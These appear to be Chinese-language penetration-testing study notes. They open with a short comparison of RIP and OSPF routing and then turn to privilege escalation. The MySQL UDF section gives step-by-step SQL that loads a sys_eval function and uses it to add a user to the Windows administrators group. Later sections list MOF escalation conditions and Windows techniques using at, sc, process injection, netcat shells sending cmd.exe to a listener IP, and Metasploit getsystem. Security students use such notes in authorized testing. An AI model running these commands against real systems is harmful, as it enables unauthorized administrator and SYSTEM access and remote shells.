Rip和ospf的区别
都是路由协议,但ospf更强大的地方是,ospf对网络的拓扑结构了如指掌,一旦某条链路断了,就可以及时给出备份路线,对通信的影响小,rip其中的某一跳路由一旦断了,就无法继续进行通信了
Rip:数跳数来计算最佳路线;仅和邻居交换路由信息;固定时间发送路由信息;限制网络规模,最大不超过15,16表示不可达
Ospf:通过计算链路的度量值来分配最优路线;向本自治系统所有的路由器发送信息(路由表信息);只有当链路状态发生变化时,路由器才会向所有路由器采用防洪的方法发送此消息;为了减少防洪对网络的压力,每次防洪数据时,仅在更小的域之间进行广播防洪,比自治系统更小的范围叫做区域
Mysql提权
Udf提权
利用前提:
1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete
权限以创建和抛弃函数,有root账号密码。
2、Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
3、Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\
system32。
4、掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限
的其它账号也可以。
在sqlmap下的D:\渗透工具\python027\sqlmapproject-sqlmap-e910fc6\data\udf\mysql\windows\64/32下有现成的udf文件
Mysql<5.0时,导出路径随意
5.0<mysql<5.1时,则需要将udf文件导出到对应服务器的系统目录(c:/windows/system32)
Mysql>5.1时,必须要把udf文件放到mysql安装目录下的lib/plugin文件夹下才能创建自定义函数
一般lib/plugin文件夹需要手工建立
数据库中执行:
(1)select @@basedir; //查找到mysql的目录
(2)select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录
(3)从udf文件中引入自定义函数
create function sys_eval returns string soname 'udf.dll'; //sys_eval
是函数名称,
udf.dll
是
lib_mysqludf_sys.dll_上传后的文件名
(4)执行自定义函数
新建账号wyy,密码为daniao
select sys_eval('net user wyy daniao /add');
(5)加入管理员组
Select sys_eval(‘net localgroup administrators wyy /add’)
Mof提权
Mof是windows的一个系统文件,位于C:\Windows\System32\wbem\MOF\mof.dll中,叫做托管对象格式,它的作用是每隔5s就会去监控进程的死亡和创建。Mof提权就是在拥有mysql的root权限,使用root权限去执行上传操作,将我们重新写过的mof文件上传,之后这个文件就会以每隔5s以system的权限运行。之所以可以提权,是因为该文件的加载过程是由system权限执行的,所以我们可以把权限最高提到system。
利用条件:
1.windows版本<=2003
2.C:\Windows\System32\wbem\MOF的目录可写入
3.数据库允许外连,且已知root账号密码
二次注入
堆叠注入
Windows提权
Useràadministratoràsystem
提权工具:
At:at+时间+/interactive cmd -----提权到system
Schtasks(新版本的系统中遗弃了at命令,采用了Schtasks)
Sc:sc Create super binpath="cmd /K start" type=own type= interact 创建一个super的cmd进程
使用 sc start super 启动该super的cmd进程
Pinjector.exe -l 可以查看可以注入的进程
使用pinjector.exe -p 2222(可注入的进程号) cmd 2345(将cmd转发到2345端口)
然后再使用nc去监听2345端口返回的cmd
nc -nv 192.168.23.131 2345
nc使用方法
靶 机:nc 192.168.23.129(监听机ip) 1234 -e cmd.exe
监听机:nc-lp 1234
常见cve(cve-2017-7344、cve-2018-8120、cve-2018-8897 )
使用msf进行漏洞利用,进入meterpreter后使用getsystem进行提权